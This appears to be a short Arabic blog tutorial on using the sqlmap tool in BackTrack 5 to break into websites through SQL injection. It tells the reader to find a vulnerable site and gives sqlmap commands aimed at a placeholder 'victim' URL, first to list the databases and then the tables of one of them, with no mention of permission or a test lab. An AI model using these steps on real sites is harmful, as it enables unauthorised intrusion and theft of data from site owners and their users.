السلام عليكم ورحمة الله وبركاته
اليوم سنقوم بشرح أداة رائعة موجودة بالباك تراك 5 وهى أداة sqlmap.py SQL التلقائي الذي يساعدك على الإختراق الموقع بسهولة. اتبع الخطوات البسيطة الإختراق الموقع باستخدام backtrak 5
1. نفتح اباكتراك ونكتب cd /pentest/database/sqlmap وبهذا بإن أداة sqlmap مفتوحة !
2. الآن العثور على موقع مصاب. (وأيضا لدي موقع مصاب)
3. الآن اكتب هذا الأمر واضغط على enter.
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs
حسنا أنا حصلت على اثنين من قاعدة بيانات AJ وinformation_schema سوف نقوم بتحديد قاعدة بيانات.
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables
ليست هناك تعليقات:
إرسال تعليق